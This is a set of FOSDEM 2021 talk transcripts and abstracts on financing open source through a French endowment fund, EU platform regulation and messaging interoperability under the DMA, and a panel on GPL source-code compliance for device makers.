Next project, we're going into open data. It was also the second project we were working on at FDL. It's called AFS.one, and it's also free software. It's a directory of European open source software publishers, and its unique selling point is that it's focusing on success cases. It's a question we often run into when we are in sales trying to sell free software: we seldom get asked how many stars the software has on GitHub, but we do get asked, okay, which large industrial company is using this? Can you show me an example? Or where is this used in a public administration where we can actually see what it's doing? So based on getting this question a lot of times, we thought: why don't we do something like a yellow pages of European open source software publishers, showing the use cases, and make the whole thing in an open and contributable format? The links are up there for everyone to check out if you're interested. We have all the data in JSON format in a Git repository and you can contribute to it. And the idea is to have that data exportable and integratable in third party applications. Just so that, if there is a catalog of famous proprietary software one and a catalog of famous proprietary software two, you also have the possibility to create a catalog of free and open source software publishers and their solutions, including the success cases. In the first step we used the first two donations we had in this project to create the first version of the website, which at that time had about 150 publishers with their solutions and success cases. It's currently still at that level, since we didn't have the budget to continue working on it all the time. It was in 2019 that we also mentioned it during the European Commission's workshop on the future of open source software and hardware, and we did a follow-up pitch for a bigger initiative at the European level, but nothing has come out of it to this point, unfortunately; it was still interesting to discuss and work on. The current status is that we have a backlog of about 150 publishers we would like to add. We also need to update the financial indicators and improve filtering and export of data, so it's easier to use and easier to integrate. So if this is a project you'd like to contribute to, we're very happy to accept donations or also contributions to add more software companies to the directory. The last example I will talk about is from the open policy area. It's about the Health Data Hub. If you're not from France, you probably don't know it. It's a French platform created by the government to collect hospital patient data. The contract was awarded to Microsoft in what later turned out to be a very questionable process, and FDL was involved in financing two lawsuits: one based on the tender process, or the lack of a tender process, and the second one regarding Schrems II. The two lawsuits were filed by an association called SantéNathon. It's a group of IT companies and non-profit organizations who work in all fields relating to data protection in the health sector. And the CNIL ruled at the end of the year; the CNIL is the Commission Nationale de l'Informatique et des Libertés, so I would say the National Commission for Data Privacy.
It ruled that in fact the Health Data Hub needed to provide short-term guarantees to assure that the data stored on this platform with Microsoft was not accessible by foreign governments. You are probably all familiar with the CLOUD Act and similar legislation, which gives access to data stored on servers of American companies no matter where they are located. So it was said that it was not okay to use Microsoft for storing these types of sensitive data, and the second request, aside from providing guarantees, was to also migrate the platform to a French or European provider. I think this was November or December last year, so it's still a topic which is far from over in my opinion, and also if you look at the last decrees of the outgoing US president, one was on requiring US cloud companies to verify the identity of foreign individuals using their services. So I think this will remain an issue until there's a real migration to a French or European provider. I remember there was also a tribune last week which talked about this in France and which said this should not take five years or three years, it should be done quicker. So it's a topic far from being over. But speaking of being over, that was almost my last slide. Coming to the takeaways, what you should take out of the last 15 to 20 minutes. Software is eating the world, but, as has also been found in numerous studies, nobody is really paying for open source software. Provided the legal conditions exist, though, endowment funds can be a tool to facilitate or incentivize investing in open source software development. Maybe this is one of the reasons why the French ecosystem of free software providers is so vibrant and active: because it's easier, in fact, to finance the development of open source software here in France. And it's a topic that has been continuously discussed at the European level for, well, I guess quite some time now. For me, one of the advantages I see in Europe, and always talk about, is that you have 27 different attempts to solve a certain problem, just by looking abroad at how other countries are doing things. And if you're able to pick things which work in countries that are successful in certain areas, there's more chance of finding the best practice. I don't want to say the French model is the best practice, but maybe it's something which warrants attention, which could be replicated elsewhere at the national or maybe even the European level. I also remember another tribune from Julia Reda a few months ago, which was asking for just that, a European Open Technology Fund, where she was talking about similar things. And I don't know if it's a fund or if it's tax incentives, but, as in another initiative, public money, public code: I think if you take the general interest, and if you can argue that open source software is in the general interest, then it could be financed as a general interest item. I think it opens quite a few interesting doors on what you could do with open source software and how you could finance it. Voilà, this is the end of my presentation. I'll be available for questions, I think for the next 10 minutes and afterwards as well. So let me know if any of the projects interested you, or if you have any follow-up questions, and thank you for your attention. I hope you can enjoy FOSDEM in the online version that it is, and I'm looking forward to hopefully having a real FOSDEM in Brussels again next year. Thank you very much and bye-bye.
So, we are live for the Q&A session. Thanks Frank for your talk. That was quite interesting and yeah, I think financing a free software project is always an issue. We now have seen how you do this in France, but do you think governments have to invest more money in free software projects? Do you think they should support it? You also mentioned the UTEC fund for example. So what are your ideas here and also maybe on the national but also on the European or even global level. Do you have any ideas here on that? So let's say, basically to answer yes, of course governments need to finance free software free and open source software. I think there's already quite a few things which exist from if I look on European and French level, the projects, the funds like Horizon, I think it's 2027 now. Projects we are also participating in and usually they all require the software to be developed to be open source. So I think on this on the one hand is a nice direct way to finance free and open source software. The vehicle I described in my talk is an indirect way, which I think also helps because you can for example now see it with the plan de relance or the recovery plan from COVID where at least here in France has not the administrative infrastructure to handle a lot of small projects. So the recovery funds usually I think they start at 50 million or higher. So all the small and medium enterprises are more or less not able to participate in project calls like this because the budgets are much too large. So I think you really have to look at it from two ways on the one hand, what direct forms of financing can you provide for free and open source software and what indirect tools or vehicles can you set up or support that also allow to finance free and open source software in a much more broader scope. I see. And what are your experience with the administration part of it? Normally if you work together with governments or administrations, you are confronted with a lot of paperwork for example. So what is your experience here, is there anything which should be or could be improved or is this working quite smoothly for you? So it's a lot. I think it's also important to have it because I mean there's also a due diligence on the side of whoever provides the funding who decides to give public money to finance a certain project. So it's necessary to have the legal security also on behalf of who is financing to make sure that the money goes into projects which really have the potential to turn out something and it's not wasted. So I don't know how to simplify it. It's a lot. I'm handling currently four projects and it takes time, let's say it like this, but it's also okay. And I mean let's say you have economies of scale if you handle more than one project because you can like from the administrative side, at least from a participant, you can reuse templates for reports. So let's say you try to cut corners on the administrative side when you have more than one project. So that helps. Yeah. So once you figured out how it works, then it's getting easier by every project you are running right? Yes, let's say that it helps, let's say like this. Of course there's differences on national and European projects, but still you can like the even for the project applications, we always use the same template and you can more or less streamline a lot of things. Let's say like this. So yeah, but it's important. So I like that these possibilities exist. I wish there would be more. 
Also, coming back to your earlier question: I think, how to say, open source, or free software, is a general interest topic. Looking for a good example, I think what we've seen just recently is the corona tracing app. This is something everybody, or every country, needs, and especially in Europe we speak so many different languages but also travel a lot across borders, and therefore it's a good idea to have interoperable solutions in place. And I also think national and European funds would be very helpful to support these kinds of projects; this is, for me at least, a takeaway from this crisis. So yes, I was happy to see so many initiatives trying to work on open source software solutions to respond to COVID, which was talked about in the earlier panel. And I think, how to say, a society is the sum of its contributions. I always say open source is a bit like society, where everyone can make a contribution. So I like the idea of having an open system we can contribute to, where you will potentially have the ideas of everyone and the knowledge of everyone rather than something cooked up by a few people. So I'm a defender of the idea that the more people contribute their ideas and capacities to something, the better the solution will be in the end. So yes, I think it's very much worth supporting. It's definitely true, and I think these are also good final words for this talk. Now we're handing over to the compliance panel which will happen directly after this talk. Thanks a lot, Sven, for this talk and for being here for the Q&A session. Enjoy FOSDEM and also the dev room here on legal and policy stuff, and yeah, thanks a lot for being here, see you later, and thanks for joining. No problem, thank you very much for having me. Bye-bye.
|
Financing open source using tax breaks on donations made to endowment funds or general interest associations is a construct available in France and a viable alternative to R&D expenditures for sponsoring open source projects. We will present several initiatives from the Libre Endowment Fund ("Fonds de Dotation du Libre" in French) - from financing feature development of open source software to releasing a 4G/5G base station as open source hardware or supporting litigation against the French government's decision to host Health Data on Microsoft servers. The recently published FOSS contributor report showed that 48.7% of contributors were paid for their contributions by their employer with only 2.95% being paid by a third party. So even today as (open source) software continues to eat the world, almost half of all projects lack the financial base for ensuring their respective software's long-term existence. To finance the long-term maintenance of its open source software stack, Nexedi has created the Libre Endowment Fund ("Fonds de Dotation du Libre" or FDL in French). It is a French endowment fund which complies with strict auditing procedures. With this status, French law permits corporations and individuals to donate to the FDL and claim back up to 60% from future income taxes (66% for individuals). Rather than investing directly in the maintenance or continuous development of own or third party solutions, Nexedi and other companies (ex. Amarisoft) can pool donations which then support the maintenance or development of open source software, open source hardware or open services. FDL also benefits from a scientific board of advisors which includes three developers of open source software (Jean-Paul Smets, Stéfane Fermigier, Gaël Varoquaux) who also hold a PhD in computer science or mathematics. This scientific board follows the same procedures as government-sponsored RTD projects and thus also contributes to the juridical safety of FDL.
|
10.5446/47989 (DOI)
|
Hello, and welcome to my talk on the regulation of the Internet platforms in Europe. So first of all, a couple of words about me. My name is Vittorio Bertola. I am the head of policy for Open-Xchange, which is a German open source software company behind Dovecot and PowerDNS. And today I would like to introduce you to the new proposals for regulating the Internet platforms that have just been presented by the European Commission. But first of all, I'd like to explain why they have been presented, and so what the analysis of the scenario is, which is pretty common in Brussels and among European politicians. And it's what I call the Hotel California. When the Internet was started, in its first early decades, it had success exactly because of this model of interoperation and interconnection between networks and between services. And the example of how services were initially made over the Internet is email. Email is an interoperable service. You can get an email address from any provider you like, and that is enough for you to communicate with any other email user all over the world, independently of which applications they use, which provider they use, which services. And anyone can offer email services: all the standards are open and public, and there are many free software implementations. It's actually very easy for anyone to start email services. And this is what happened and what allowed the Internet to grow so quickly. And it's not just about email; the web initially was made in the same way. And this is what unleashed the power of growth of the Internet. But then something happened. The Internet became a mass media, became the object of consumer services, and a lot of money started to revolve around it. And so consolidation started to happen. A few companies started to become bigger and bigger, and we ended up in very concentrated situations. So for example, after the smartphones came, the smartphone market is now very concentrated. You only have a choice between two operating systems: either it's Google's Android or it's Apple's iOS. And even in terms of the apps, there are millions of apps, but in the end the ones that are used more frequently are often owned by the same company, like Facebook for social media and messaging apps. And the move to the cloud also has the same issue. The cloud market is quite concentrated; actually, the biggest players have well over half of the market. And you see, they are always the same companies, and also some of the Chinese companies are now coming. So these are just a few examples. But in the end, we are now in a situation in which the tech companies became so big that they reached a size that was never seen in the history of mankind before. So there have been tech companies, I mean, very big tech companies in the past, but it never happened that the five most valuable listed companies in the world were five tech companies. And in 2019, they went over the $1 trillion market capitalization, which is amazing. But it's continuing to grow. So this was about two weeks ago, and Apple was already well over the $2 trillion mark. And $2 trillion is more than any EU country's GDP, except for France and Germany. So these companies are now bigger than most European countries. And this is scaring European politicians. So this is seen as a problem. For example, to show how this actually affects European budgets, this is a chart showing the advertising revenues of Google from Italy in 2018.
It's estimated that over 700 million euros were the revenues of Google from advertising in Italy, but then less than five million euros went back to Italy in the form of taxes. All this money is being brought to Ireland, and then from Ireland it's being brought to the global headquarters, and it stays there. And so there's very little return for Europe on this. And on the other hand, what you see is that the median price for a house in San Francisco has grown by 2.5 times in seven years. So you really see all this wealth being taken away from Europe and from other parts of the world and moving into this very small part of the US, being concentrated there. And this is not something that Europe can accept. It's becoming a threat to the economic stability of Europe itself. So this is what we call Hotel California, because you can check out any time you like, but you can never leave, because all the services are owned by these companies, and they adopt business practices that make it very hard for you to move to something different and make it very hard for any new possible competitor to grow and actually succeed in competing with them. They adopt business practices that make this very hard, and they build walled gardens that keep you locked in. And as an example of this, the good example is instant messaging, especially if you compare it with email. Instant messaging is built around walled gardens. You actually need to have several apps, because if you want to exchange messages with WhatsApp users, then you need to use WhatsApp, but then you also need to have Messenger to communicate with Messenger users, and then Skype for Skype users, and Telegram, and so on. And so you have to handle a plethora of applications and accounts, and this is inconvenient. And more importantly, you cannot move. So you don't really have a choice. If you want to move to a different app, you lose your contacts and your history. And this makes it harder for new competition to emerge, because even if you start a new instant messaging app, even the best possible instant messaging app, much better than the existing ones, then people won't bother trying it. And even if you convince someone to try it, then there would be no other users, so they would not be able to exchange messages with anyone else, because all the users are still on the other services. And so this is built in a way that forces users to stay there and basically stifles competition and innovation as well. And once these control positions are built, we've seen from Europe more and more examples of how this is leading to things that we don't like. We've seen the Huawei case, for example, in which Huawei was suddenly shut out of, basically, using Google's Android. And that's actually an example of something that happened not just because of the company, but because of the fact that the company was located in a specific other country outside of Europe; there was a president at the time who decided to force them to do this. And this is a risk which is unacceptable for Europe and for its companies. On the other hand, sometimes it's the company that forces you: Apple is known for the fact that if you have an app and want it on the App Store, then, if the app sells something, you must use Apple's payment system and give them 30%. And you don't have a choice about this.
And then there's an issue with startups, with the big platforms buying out European startups before they can actually become big and continue to stay here and compete and create wealth and jobs here. There is a big concern in Europe around surveillance capitalism; Europe, with the GDPR, has been trying to stop this. But these big platforms, many of them, make most of their revenues from targeted advertising, like Google, like Facebook; even Microsoft makes money out of Bing advertising, like billions of dollars. And even for the non-personal data, these companies are amassing amounts of data that put them at an advantage in competing with everyone else, I mean, the fact that they can aggregate the information that they acquire by tracking people. And so they make it hard for other people to offer the same services successfully. And then there were situations that have again concerned the European politicians: the NSA scandal was a big scandal in Europe as well, because it affected also Angela Merkel and other politicians. And so that's when they realized that relying on technology and services that are provided by foreign companies outside of Europe is a strategic risk to national security. And there's a concern about encryption now, because while encryption is a good thing, it protects your privacy, it also makes it very hard even for users themselves to control what's happening. And if you couple this with the Internet of Things, we are filling our homes with objects and home assistants and smart TVs. These devices send back encrypted data all the time; you have no idea what they are sending back or where they are sending it. And it's very hard to enforce the laws, because the services are being provided from outside of Europe. And so we are creating a situation in which the user, and even the local authorities, have really no control over what's happening with the data. And the most recent cases that created concerns again were high-profile situations like last year's coronavirus apps, when Google and Apple basically decided for everyone, for all European countries, how this should be made, technically but also in terms of policy. And there were some countries, especially France, that were really not happy about this. They wanted to do things in a different way, and then they were faced with the choice of either doing what Google and Apple wanted, or having a hard time in making things actually work. And so this was deemed unacceptable by several of these countries, even if they had to put up with it. And finally, very recently, there's been the Trump ban case, and Angela Merkel, through her spokesperson, has actually spoken about that and expressed concern, because, no matter what you think actually happened, the idea that a private American company can silence a ruling, elected politician of a Western country is considered really unacceptable and scary in Europe. So what's happening about this? This is how Europe is trying to run for the door and change this situation. There's been a lot of talk in the last couple of years in Brussels, and mostly in other capitals like Berlin and Paris, about digital sovereignty. So that's the term of art now. This term means different things to different people in different countries. In Germany, it's more about digital autonomy.
It's more about having local European services, so that the data stay in Europe and are managed by European companies under European law, and about having the capacity to survive any kind of embargo or commercial problem with the US and with China, so that the national economy and the national technological platform can survive even international problems. For the French, it's really more about sovereignty. It's about controlling the Internet, being able to make rules and enforce them, and deciding, for example, issues around content and checking what's going on over the Internet. So all these different things go under this term of digital sovereignty. And there's a number of requests that are being made in different terms; of course different people and countries have slightly different views, but more or less summarizing, this is a long list of what Europe expects from big tech. First of all, pay taxes here and don't bring all the wealth somewhere else. Stop tracking the citizens, share the data, don't steal startups, don't kill competition, don't adopt these lock-in practices and exploit the dominant positions. Stop spreading fake news and especially making money out of fake news and harmful content and bad stuff that's all over the place. Don't silence people, so we want guarantees about free speech in real terms. And there's also the discussion around encryption and about lawful interception of encrypted communications, which is also a very delicate discussion that's going on. So some of these requests will be addressed by the regulations we are going to talk about. But first of all, since we are at FOSDEM, I'd like to point out that open source is also part of this picture. And open source actually fits the European policy, because often Europeans are told: you should just develop your own Google, and if you don't develop a Google, that's because you're bad, you're not good at creating companies, so it's too bad for you. But it's really different, because Europe is not a monolith. It's an archipelago of countries, of markets. It works by horizontal cooperation at any level. And this is why it naturally doesn't produce GAFAs; it produces alliances of smaller companies. And this is really the model of open source: interconnection and peer-to-peer cooperation around common open standards. And this is why the European policies are more and more promoting and defending open source and choosing open source as the model. And so while the open source movement is putting in the technology and the standards and the experience in cooperation, Europe is putting in the rules and the funding and trying to defend the rights and the opportunities for the open source movement as well. And this is why you will see open source quoted a lot in European press releases. So now, finally, we can get to the three proposals that I wanted to talk about very quickly. The first one is the so-called Digital Services Act, and it's the one focusing on content, accountability, advertising, moderation and so on. The Digital Markets Act is more about competition. It was originally called the new competition tool, to address situations of market failures that do not really fall into traditional competition law. It's about business practices and it's about interoperability, as we will see. And finally there's the Data Governance Act, which is really about access to public data. So now, these are just proposals.
The first drafts have been released by the European Commission and they are up for discussion. They will still have to go through the European Parliament; it will still take at least a couple of years for them to be approved, if they ever get approved. So it's really the time to discuss them. The Digital Services Act is basically the old e-Commerce Directive. It's restating and upholding the original mere conduit principle, which says that intermediaries are not responsible for the content they transmit on behalf of the users. But it's putting conditions on that now. First of all, there's a GDPR-style global reach clause, so that even non-European companies, if they do business in Europe, are affected by these rules. And there are additional requirements for the online platforms, which are platforms that disseminate user-provided content or sell user-provided goods. These platforms are required to provide recourse mechanisms against their decisions, to identify their business customers, to rely upon trusted flaggers, to take down content promptly when necessary. And there are additional clauses for very large online platforms, which are the ones that have over 45 million users. They are about transparency and accountability of algorithms and of moderation procedures. They are about risk management for manipulation, also foreign manipulation. They are about giving choice about content recommendation and curation algorithms, and so on. The Digital Markets Act, as I said, is more about business users of two-sided market platforms like Amazon. And it affects the gatekeeping online platforms, so 45 million consumers, but also 6.5 billion euros of annual turnover in the Union and at least three European countries. It's basically a new instrument for the digital age, for situations that don't fall under traditional dominant-position definitions but still are deemed to affect competition. So this is where I wanted to focus, more precisely on interoperability, because part of the Digital Markets Act is just about forbidding very basic practices that are deemed to be negative for everyone except for the platform. So, for example, mandatory bundling of services, that is, forcing you to use more than one service and integrate the data across the services; or best-price clauses that force you to offer the best possible price through the platform; clauses that prevent you from going to court against the platform; and other things like that. So there's a sort of list of prohibited practices. But then there's another article which is about things that are to be better specified, and interoperability is one of them. So why is interoperability important? Because, to get back to where we started, it's the original principle of services, and we think that services like email that were built around interoperability offer much more choice and competition and opportunities for privacy than the most recent instant messaging services. So we think that even for these newer services, the dominant platforms, the dominant players, should be required to interoperate with competitors and allow third-party applications to exchange messages with their users through common interfaces.
And this would allow users to choose any app and service provider they like, and it would also allow new entrants to propose new applications and actually have a chance of succeeding in competition, because then users could actually try these new apps and still continue discussing with their existing contacts on the old applications. And so this would enable European competition, European companies, to grow and keep wealth and jobs here, and promote privacy-friendly services, because if users could choose, they would not be forced to accept unilateral terms and conditions by these platforms, which are often pretty negative for the users. They would be able to pick the most privacy-friendly services. So, there are some interoperability clauses in the draft of the DMA. There is basically one that says that business users have a right to interoperate, but only for ancillary services. Ancillary services are, for example, payments, or logins and identification services, or advertising services, but not the core services. So this is just about these separate ancillary services. And there is a clause also on portability, which was possibly introduced with the hope that, by giving you real-time portability, you could build a third-party app that in real time gets your new messages from the existing app. This is not a solution for the problem, because this model of interoperability would require you to still maintain an account on the existing dominant service, and so it would require you to accept their terms and conditions and give up your privacy and your data. So we think that this is not really a solution. So this is why, as part of a coalition of NGOs and European companies of the messaging space, we are really trying to ask for true interoperability to be added into the DMA and to be required of dominant platforms, not just for business users: interoperability and fair competition and choice should be available to all European citizens. And interoperability should be mandated for all core consumer services, starting from messaging and social media, not just for the ancillary ones. So these are the requests that we have been making, and I'm glad I could share them here. And of course we hope to create some discussion around this in the community, and I'm happy to take questions. So thank you for your attention.
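As a rough illustration of the quantitative side of the gatekeeper definition summarised earlier in this talk, the sketch below encodes only the three draft thresholds quoted above (45 million consumers, 6.5 billion euros of annual turnover in the Union, presence in at least three European countries). The actual Article 3 criteria in the Commission's draft are more detailed (a market-capitalisation alternative, business-user counts, multi-year averages), so this is a simplification, and the example platform is hypothetical.

```python
# Rough sketch of the quantitative gatekeeper test as summarised in the talk.
# Only the three figures quoted in the talk are encoded; the draft DMA's
# Article 3 is more detailed (market-cap alternative, business-user counts,
# multi-year averages), so treat this as an illustration, not the legal test.

def is_presumed_gatekeeper(eu_consumers: int,
                           annual_eu_turnover_eur: float,
                           member_states_active: int) -> bool:
    return (eu_consumers >= 45_000_000
            and annual_eu_turnover_eur >= 6_500_000_000
            and member_states_active >= 3)

# Hypothetical messaging platform: 300 million EU users, 20 billion euros of
# annual EU turnover, active in all 27 member states.
print(is_presumed_gatekeeper(300_000_000, 20e9, 27))  # True
```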
|
The Internet originally thrived on interoperable services - until the "walled gardens" came. The European Commission recently proposed new regulations (DSA/DMA/DGA) to protect democracy and restore openness and competition. The talk will introduce them and their economic and political background; it will then focus on a specific point, the requirement for dominant platforms to interoperate with third parties, though only in limited cases, using messaging and social media as example. A few decades ago, the Internet was open, interoperable and based on federated services that allowed everyone to cooperate and deploy new content and services: email is the classic example. Then, consolidation happened: the talk will show a common European perspective of how we ended up with a concentration of money and power of unseen scale in the history of mankind, which perpetuates itself by adopting the "walled garden" service model. The best example of this model is instant messaging, where people have a hard time switching to different service providers as they need to be on a specific app to communicate with all the other users of the same app. This creates dominant positions that are often used to impose unfavourable terms and conditions onto users. In the European political and regulatory scene, this has been increasingly perceived as a problem under many dimensions: tax revenue, privacy, national security, law enforcement, free speech, and even democracy. All these dimensions boiled down into a call for "digital sovereignty", meaning more autonomy and stronger reliance on EU-provided services that keep the wealth they produce local, but also more control and stronger capabilities to set and enforce European rules for the Internet in Europe, without having to negotiate them with the big American platforms. Open source has been identified as a fitting software development model for Europe and increasingly supported. Open source development matches the "cooperation in diversity" that is required by the multinational, multicultural nature of the European Union, and naturally offers remedies to consolidation. After quickly introducing the three regulatory proposals - the Digital Services Act, the Digital Markets Act and the Data Governance Act - the final part of the talk will focus on the DMA and on a specific topic: interoperability provisions. "Walled garden" instant messaging apps could be turned into open, federated email-style services by forcing dominant providers to open up and interoperate with potential competitors, so that users of one app could exchange messages with the users of all the other apps. The current DMA proposal by the European Commission, however, only does this in part. The interoperability clause in Article 6.1(f) only covers ancillary services such as payments, advertising or identification, but not core services like messaging and social media; and only for business users. The "real time" data portability clause in Article 6.1(h) would not allow true interoperability and would still require users to hold an account on each service and accept its unilateral contractual terms. The talk builds on the efforts of a coalition of open source software companies and digital rights NGOs that have been campaigning for full interoperability clauses in the DMA. It also builds on a technical policy paper that discusses the topic and that was submitted to the Commission during last summer's consultation. 
We hope to open up the debate, validate our ideas and build community discussion around this issue.
|
10.5446/51978 (DOI)
|
Hello, everyone, and welcome to our panel for our FOSDEM legal and policy dev room on compliance. This has become somewhat of a staple for our dev room. We're doing it, of course, remote this year because of the pandemic, but we have a couple of great panelists that are going to dig in today to discuss the issues of doing GPL compliance with a focus on what happens for the customers, the users, the individuals who get devices, how do we assure that they have the source code they're supposed to get under copy left licenses that works, and we're going to talk about it from a number of different perspectives from folks all over the industry. I have joining us today, first of all, John Sullivan, the executive director of the Free Software Foundation. We have Davide Ricci, the director of open source technology center at Huawei. We have Eilish Nilonigan, also known as Pidge, who is the CEO and CTO of Togan Labs and the chief architect of Network Grade Linux. And coming to us from the legal side, we have Miriam Belhausen, who's a lawyer at Bird and Bird and focuses on copyright law. So to get started, I would like to start with asking John a question because, John, you worked for the principal person at the organization that started the whole idea that software freedom was an important issue way back in 1985, and we're really the first to talk about why it's important. Can you tell us a little bit about why the issues of compliance with copyright, the copy left licenses fit so directly and importantly with the issues of the compliance requirements, the details in those licenses that companies and redistributors have to follow? Sure. And thanks for having me on the panel. I'm looking forward to the rest of this discussion. I think it's a very special thing about free software that it is designed to have both fully commercial and non-commercial purposes. And so we, at the FSF, use this as a social movement for sure with an ethical foundation and an ethical mission, but these chances to talk together with the people that are using the software commercially and have experience doing that and hearing their experiences is really an important part of that. So the primary copy left license, I think that we have in mind is the Gidu general public license and that has a very simple requirement and it's a phase that you have to share when you distribute a program to another person. You have to share the source code, which is what you as a programmer or what the programmer is that you hire actually use to modify the program and create the program, the human readable code. And the reason that that's requiring it is because of binary program that's not particularly useful other than for purposes of being able to run it or hand it off to somebody else so they can run it too. If you wanted to understand anything much about how the program works or you want to be able to make changes to it, you have to have the source code for that. And that's the whole reason for free software where it's existence is so that users are in control of the devices that they have, the software powered devices that they have rather than those devices being in control of them. And if you can't inspect the program that's running on your laptop or your phone or in your car, then you can't actually know what it's doing other than trusting the company that gave you that software, you know, trusting that they're telling the truth. The same point of example is unfortunately where that doesn't pan out. 
And then second of all, even once you understand it, if you want to be able to make a change to it, you also need the source code for that. And I think the closing key thing here is just that these rights aren't just for programmers. Anybody, if they have the source code, can go to a programmer and ask them to make a change for them, just like you can get your car repaired at a mechanic or have someone else fix the HVAC system in your house. But you can't do that unless you have the rights to the source code and the freedom to take it to other people and ask them to do things. And Pidge, that's why I want to come to you here, because one of the focuses of your work, as I understand it, is to help people, and help those who build these devices, which are these days a lot more complicated than they were when these licenses first came out, to actually make that software build and work correctly and create these compliant source releases that are required under these licenses. Can you talk a little bit about what you're seeing in your work trying to help your clients get that source code right, and what the challenges are that they face with regard to the interaction between the details of that software and its source code and their compliance requirements? Right. So a little background here. When people do a lot of software compliance work, they're often doing it around one chunk of the software; I'm doing entire firmware blobs, so entire Linux stacks. And it's complicated, because it's not just that I need to know what software is on it and what the licenses are; you also end up needing to know how it's built and how it's all tied together. So with a lot of my clients, it's initially: why do we need this? Can't we just throw out the metadata and just have it that way and not actually provide the source code, they can get the source code from upstream? That conversation. So there's a period of buy-in initially, and then the complicated work happens, which is going through each and every bit, figuring out which source package is used, because one bit of source code, one package, may have multiple things that come out of it with various different licenses. So for example, I don't know, I use this all the time: puzzle. Puzzle may have puzzle, puzzle-dev, puzzle-docs, and they're all going to have very different licenses. So it's understanding everything from nuts and bolts, all the way from the initial build system, to how everything's built, to how everything's deployed. So there's a lot of teaching developers things that they shall not do, like static compilation of closed-source software against GPL code, which, we have to have that conversation. And software developers are clever, and they go, what if we do a shim layer and, and, you know, just stop trying to get around that. So there's a lot of education on the corporate side that I end up having to do, to teach developers how to do this, how to do this correctly, and how to do compliance activities afterwards. Does that answer your question? Yeah, it does. And I want to go to Davide now, because what you're doing is you're looking from inside your company and trying to build up and answer these questions so that your employees know how to do this correctly, how to incorporate free and open source software into your products.
Why don't you tell us a little bit about how you design that strategy from inside a company to make sure that you're getting that final source release at the end; as Pidge says, looking at the entire firmware blob and making sure you have what's required for the entire firmware, not just one part. So first of all, you know, I've done this a couple of times: I've done it at Wind River, I learned it at the Intel OTC school up in Portland, and now I'm doing this at Huawei. So the first thing that you have to do is just plan for it first. Even before you start building code, you know that you're going to be using open source software when you build an operating system. So the first thing that you have to think is: how do I ensure the compliance, right? And how do I do it incrementally? So over time, I mean, initially it was a lot of, you know, guessing and let's-figure-it-out work. Right now we have good standards that are coming up, for instance the Linux Foundation with the OpenChain standard, which is really industry-oriented. The Free Software Foundation is helping us a lot, especially in Europe, helping Huawei to actually do it, right? But, you know, as I said, if you want to go with OpenChain, it's about creating a policy and funding the policy. So essentially you've got to make sure that it's funded, that there are people to actually follow the policy. Training individuals, so that developers and managers know what the process is and what their roles are, so that at the end of the day everybody knows the dos and the don'ts. And then you start building that bill of materials that tells you: hey, in this device there's this software, these are the licenses, this is the manifest, these are the authors, this is the license that we think the software has. Oh, and by the way, hey, IP analysts, can you go look, because some licenses are not clear. At the end of the chain, you have the best possible accuracy when it comes to the bill of materials. There's no 100% accuracy; business is about risk and gain. But as a general manager, I don't want to go to market with a big unknown. So at the end of the day, it's the most accurate bill of materials that gets me through. And if there's a red flag that is flagged, you know, for you by the team, then you take a risk-based decision. But that's pretty much the process you follow. Yeah. And so you identified risk, and that brings me to want to ask Miriam about that question of risk, because ultimately, if there were no requirements in any of the open source and free software licenses that we have, particularly the copyleft ones, no one would worry about any of these questions that Davide is talking about. So Miriam, what do you see? We're so many years now into adoption of open source and free software in companies. When you talk to your clients, what is their legal concern? What is their fear? And on the other side of it, are they able to convert that legal risk into "let's make things better for our customers"? Like, where do you see that divide happening in the clients that you're talking to? Yeah, happy to answer that, and also, thank you for having me on this. So to be honest, I think there's a big difference between different types of companies and the risks or the issues that they see. So there are, let's say, companies that have been in the software business for a very long time and they've been working, developing with software. They are really knowledgeable already.
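As a toy illustration of the bill-of-materials triage Davide describes above (list what ships in the device, record the declared license of every output package, and flag anything unclear for an IP analyst), here is a minimal sketch. The package names and license strings are hypothetical except for busybox, and this is not any company's actual tooling, nor a substitute for a scanner such as FOSSology.

```python
# Toy illustration of the bill-of-materials triage described above: record the
# declared license of every package shipped in the image and flag anything
# unclear for an IP analyst. Entries other than busybox are hypothetical.

AMBIGUOUS = {"", "CLOSED", "unknown", "NOASSERTION"}
COPYLEFT_HINTS = ("GPL", "LGPL", "AGPL")

bom = [
    # (source package, output package, declared license)
    ("busybox", "busybox", "GPL-2.0-only"),
    ("example-lib", "example-lib-dev", "MIT"),
    ("example-lib", "example-lib-doc", "NOASSERTION"),
    ("vendor-blob", "vendor-blob", "CLOSED"),
]

for source, package, license_id in bom:
    if license_id in AMBIGUOUS:
        print(f"REVIEW: {package} (from {source}) has unclear license "
              f"'{license_id}' -> send to the IP analysts")
    elif any(hint in license_id for hint in COPYLEFT_HINTS):
        print(f"COPYLEFT: {package} (from {source}) is {license_id} "
              f"-> corresponding source must accompany the release")
    else:
        print(f"OK: {package} (from {source}) is {license_id}")
```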
They know what they're doing, maybe kind of like Huawei. And as Davide just said, they are looking into this. They are working on strategies. They are looking at the software that they're using. They are looking at it from the beginning. And they have very specific questions, and they generally also already know how they would handle certain risks. And then on the other end of the spectrum, you have more, let's call them traditional companies, coming into the software space, that have maybe just built whatever device, let's say a fridge, for years. And now all of a sudden the fridge is smart and uses a lot more software, and they are working with a lot more software, and that's really not their core business so far. And they tend to be looking at the software development and the risks they assume open source software has from a totally different perspective. So with these types of companies, you would still hear questions like, well, how can we even use open source software? There's a copyleft in there and all of that is a really big risk. So you kind of have to find out where they stand, how far along in this development they are, how much they have looked into this, what type of developers they are working with, how knowledgeable they are, and how much they are pushing. Are there maybe differences in the different areas they are working in? So yeah, that's a big spectrum, I would say. And so I want to connect that up to ask John, because when you talk about the risk and reward and analyzing that, I think from the activist side you probably look at this a little bit differently. So the reward, I would guess, to the activist, and admittedly I'm an activist too, so I know this is true, is that with copylefted software being in these devices, it means software freedom for people who get the devices with the source code done correctly. But of course, the risk is the risk of non-compliance, and in your world that means software users don't get freedom. So when you look at this, how do you reconcile that question of risk and help to educate and explain to people that the risk is really a reward, because your customers get software freedom? Yeah, and I think that it's important for anybody distributing particularly copyleft software to understand that this dynamic is what gave them that software to begin with. And so the risk of non-compliance, on one hand, an important part of it is that you're not respecting your users, your customers, anybody that's receiving the software from you, but you're also, sort of in a long-term way, undermining your own business model. Because this collaboration model is what created the software that you're using, that you're able to ship with your products. And if you're not doing that properly, then you're not enabling possible participation by other people. You're not enabling bug reports. You're not enabling the entire culture that created this thing that you're able to use. But yeah, for us it's more than just the risk from a very short focus. The company perspective is possibly being sued or having to go through a complicated legal conversation with somebody, and that is certainly a risk that people should worry about. And one of the things that we do is enforcement at the FSF on the GNU software that we hold copyright over.
